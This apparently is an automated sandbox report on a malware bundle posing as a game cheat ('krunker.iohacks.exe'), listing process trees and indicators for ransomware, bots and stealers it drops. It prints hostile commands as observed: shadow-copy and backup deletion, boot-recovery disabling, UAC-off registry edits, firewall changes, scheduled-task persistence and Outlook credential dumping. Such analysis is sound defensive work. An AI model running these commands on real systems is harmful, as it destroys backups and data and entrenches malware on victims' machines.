description pid Process procid_target PID 1432 wrote to memory of 2596 1432 krunker.iohacks.exe 153 PID 1432 wrote to memory of 2596 1432 krunker.iohacks.exe 153 PID 1432 wrote to memory of 2596 1432 krunker.iohacks.exe 153 PID 2596 wrote to memory of 5116 2596 cmd.exe 151 PID 2596 wrote to memory of 5116 2596 cmd.exe 151 PID 2596 wrote to memory of 5116 2596 cmd.exe 151 PID 2596 wrote to memory of 3044 2596 cmd.exe 149 PID 2596 wrote to memory of 3044 2596 cmd.exe 149 PID 2596 wrote to memory of 3044 2596 cmd.exe 149 PID 2596 wrote to memory of 764 2596 cmd.exe 82 PID 2596 wrote to memory of 764 2596 cmd.exe 82 PID 2596 wrote to memory of 764 2596 cmd.exe 82 PID 2596 wrote to memory of 2564 2596 cmd.exe 144 PID 2596 wrote to memory of 2564 2596 cmd.exe 144 PID 2596 wrote to memory of 2564 2596 cmd.exe 144 PID 2596 wrote to memory of 1676 2596 cmd.exe 143 PID 2596 wrote to memory of 1676 2596 cmd.exe 143 PID 2596 wrote to memory of 1676 2596 cmd.exe 143 PID 2596 wrote to memory of 1916 2596 cmd.exe 142 PID 2596 wrote to memory of 1916 2596 cmd.exe 142 PID 2596 wrote to memory of 1916 2596 cmd.exe 142 PID 2596 wrote to memory of 4024 2596 cmd.exe 141 PID 2596 wrote to memory of 4024 2596 cmd.exe 141 PID 2596 wrote to memory of 4024 2596 cmd.exe 141 PID 1676 wrote to memory of 3316 1676 [email protected] 140 PID 1676 wrote to memory of 3316 1676 [email protected] 140 PID 1676 wrote to memory of 3316 1676 [email protected] 140 PID 1676 wrote to memory of 736 1676 [email protected] 139 PID 1676 wrote to memory of 736 1676 [email protected] 139 PID 1676 wrote to memory of 736 1676 [email protected] 139 PID 1916 wrote to memory of 1332 1916 RIP_YOUR_PC_LOL.exe 138 PID 1916 wrote to memory of 1332 1916 RIP_YOUR_PC_LOL.exe 138 PID 1916 wrote to memory of 1332 1916 RIP_YOUR_PC_LOL.exe 138 PID 2596 wrote to memory of 1788 2596 cmd.exe 83 PID 2596 wrote to memory of 1788 2596 cmd.exe 83 PID 2596 wrote to memory of 1788 2596 cmd.exe 83 PID 764 wrote to memory of 400 764 [email protected] 133 PID 764 wrote to memory of 400 764 [email protected] 133 PID 764 wrote to memory of 400 764 [email protected] 133 PID 3044 wrote to memory of 4792 3044 bot.exe 131 PID 3044 wrote to memory of 4792 3044 bot.exe 131 PID 3044 wrote to memory of 4792 3044 bot.exe 131 PID 4024 wrote to memory of 2292 4024 ska2pwej.aeh.exe 130 PID 4024 wrote to memory of 2292 4024 ska2pwej.aeh.exe 130 PID 4024 wrote to memory of 2292 4024 ska2pwej.aeh.exe 130 PID 1788 wrote to memory of 4368 1788 x2s443bc.cs1.exe 127 PID 1788 wrote to memory of 4368 1788 x2s443bc.cs1.exe 127 PID 1788 wrote to memory of 4368 1788 x2s443bc.cs1.exe 127 PID 1332 wrote to memory of 2492 1332 1.exe 86 PID 1332 wrote to memory of 2492 1332 1.exe 86 PID 1676 wrote to memory of 4488 1676 [email protected] 96 PID 1676 wrote to memory of 4488 1676 [email protected] 96 PID 1676 wrote to memory of 4488 1676 [email protected] 96 PID 1676 wrote to memory of 2160 1676 [email protected] 88 PID 1676 wrote to memory of 2160 1676 [email protected] 88 PID 1676 wrote to memory of 2160 1676 [email protected] 88 PID 764 wrote to memory of 4528 764 [email protected] 125 PID 764 wrote to memory of 4528 764 [email protected] 125 PID 764 wrote to memory of 4528 764 [email protected] 125 PID 2492 wrote to memory of 4068 2492 cmd.exe 91 PID 2492 wrote to memory of 4068 2492 cmd.exe 91 PID 2492 wrote to memory of 4068 2492 cmd.exe 91 PID 1916 wrote to memory of 1648 1916 RIP_YOUR_PC_LOL.exe 94 PID 1916 wrote to memory of 1648 1916 RIP_YOUR_PC_LOL.exe 94 -
System policy modification 1 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bot.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" bot.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" bot.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 6.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 3832 attrib.exe 2004 attrib.exe 3316 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2596
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]1⤵
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall reset2⤵
- Modifies Windows Firewall
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
PID:4528 -
C:\Windows\system32\wbem\wmic.exe"C:\l\..\Windows\dslx\dyx\..\..\system32\el\ggpy\..\..\wbem\mwkh\dtstq\..\..\wmic.exe" shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7084
-
-
-
C:\Windows\SysWOW64\netsh.exeC:\Windows\system32\netsh.exe advfirewall set allprofiles state on2⤵
- Modifies Windows Firewall
PID:400
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VV5V_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:6096
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___Q1EGTJTM_.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3864
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit2⤵
- Executes dropped EXE
PID:5136 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit3⤵PID:6264
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im E4⤵
- Kills process with taskkill
PID:7036
-
-
C:\Windows\SysWOW64\PING.EXEping -n 1 127.0.0.14⤵
- Runs ping.exe
PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exeC:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6156
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"x2s443bc.cs1.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp"C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp" /SL5="$30210,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"2⤵
- Executes dropped EXE
PID:4368
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61B7.tmp\61B8.tmp\61B9.bat C:\Users\Admin\Desktop\1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s62⤵
- Executes dropped EXE
- Modifies registry class
PID:4068 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://iplogger.org/2bB2s63⤵
- Executes dropped EXE
PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe1⤵PID:4488
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 184691704838826.bat1⤵PID:2160
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs2⤵PID:2176
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE1⤵
- Views/modifies file attributes
PID:3832
-
C:\Users\Admin\Desktop\10.exe"C:\Users\Admin\Desktop\10.exe"1⤵
- Executes dropped EXE
PID:1648 -
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2228
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:2004
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
PID:4488
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"1⤵
- Executes dropped EXE
PID:2304 -
C:\Users\Admin\AppData\Local\TEMPEX~1.EXEC:\Users\Admin\AppData\Local\TEMPEX~1.EXE2⤵
- Executes dropped EXE
- Modifies registry class
PID:1064
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"1⤵
- Executes dropped EXE
PID:2456 -
C:\Users\Admin\AppData\Local\TEMPSP~1.EXEC:\Users\Admin\AppData\Local\TEMPSP~1.EXE2⤵
- Executes dropped EXE
- Modifies registry class
PID:4476 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs3⤵
- Executes dropped EXE
PID:5504 -
C:\Windows\SysWOW64\wscript.exeC:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs4⤵PID:5056
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""1⤵PID:1964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5040 -ip 50401⤵PID:3316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1304 -ip 13041⤵PID:484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 3201⤵
- Program crash
PID:3284
-
C:\Users\Admin\Desktop\6.exe"C:\Users\Admin\Desktop\6.exe"1⤵
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1456 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\l41MpFgpBE.bat"2⤵PID:6196
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:864
-
-
C:\Program Files\Java\jdk-1.8\include\bot.exe"C:\Program Files\Java\jdk-1.8\include\bot.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:5280
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 3241⤵
- Program crash
PID:3832
-
C:\Users\Admin\Desktop\8.exe"C:\Users\Admin\Desktop\8.exe"1⤵PID:4528
-
C:\Users\Admin\Desktop\7.exe"C:\Users\Admin\Desktop\7.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"2⤵
- Accesses Microsoft Outlook accounts
PID:6464
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5872
-
-
C:\Users\Admin\Desktop\5.exe"C:\Users\Admin\Desktop\5.exe"1⤵
- Executes dropped EXE
- Modifies registry class
PID:1496 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"2⤵
- Executes dropped EXE
PID:6216 -
C:\PROGRA~3\system.exeC:\PROGRA~3\system.exe3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6592 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:5172
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs1⤵
- Executes dropped EXE
PID:4304 -
C:\Windows\SysWOW64\wscript.exeC:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs2⤵
- Drops file in Drivers directory
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:2324
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""1⤵PID:2888
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"1⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exeC:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://iplogger.org/2bB2s61⤵
- Executes dropped EXE
PID:1008
-
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exeC:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe1⤵
- Executes dropped EXE
PID:5040
-
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exeC:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe1⤵
- Executes dropped EXE
PID:1304
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe"1⤵
- Executes dropped EXE
PID:4492 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exeC:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6208
-
-
C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp"C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp" /SL5="$4022C,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"1⤵
- Executes dropped EXE
PID:2292
-
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\include\bot.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4696
-
C:\Users\Admin\Desktop\1.exe"C:\Users\Admin\Desktop\1.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1332
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q1⤵
- Modifies file permissions
PID:736
-
C:\Windows\SysWOW64\attrib.exeattrib +h .1⤵
- Views/modifies file attributes
PID:3316
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"ska2pwej.aeh.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4024
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe"RIP_YOUR_PC_LOL.exe"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1916
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]1⤵
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:7140
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:6516
-
-
C:\Windows\SysWOW64\cmd.exePID:6192
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:6100
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:4296
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f2⤵PID:5832
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:6480
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:5804
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
PID:660
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:484
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1836
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:5132
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
PID:4192
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1832
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
PID:4488
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:708
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
PID:284
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:6876
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:5428
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5864
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]2⤵
- Executes dropped EXE
PID:6360
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:6168
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5592
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:4060
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:7088
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:5228
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:5328
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:5680
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:7156
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:3276
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:6896
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:3508
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:6508
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:4272
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:6820
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:2468
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:6160
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:5544
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:5436
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:1952
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:6852
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:5052
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:6600
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:7072
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:1912
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:456
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exePID:2788
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]PID:428
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exetaskdl.exe2⤵PID:4224
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:2564
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"1⤵
- Executes dropped EXE
PID:6752 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exeC:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe2⤵
- Executes dropped EXE
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp"C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp" /SL5="$4031E,4513031,54272,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2696 -
C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe"C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -i4⤵PID:6036
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 1934⤵PID:5328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 1935⤵PID:7124
-
-
-
C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe"C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -s4⤵
- Executes dropped EXE
PID:5820
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\setup\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6896
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe"bot.exe"1⤵
- Executes dropped EXE
- Modifies system executable filetype association
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3044
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe"4363463463464363463463463.exe"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5116 -
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe"2⤵PID:4324
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exeC:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe3⤵PID:6708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 8844⤵
- Program crash
PID:6740
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe"2⤵PID:5136
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000\bot.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\DesktopShellAppStateContract\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6612
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C81⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5168
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C81⤵PID:3564
-
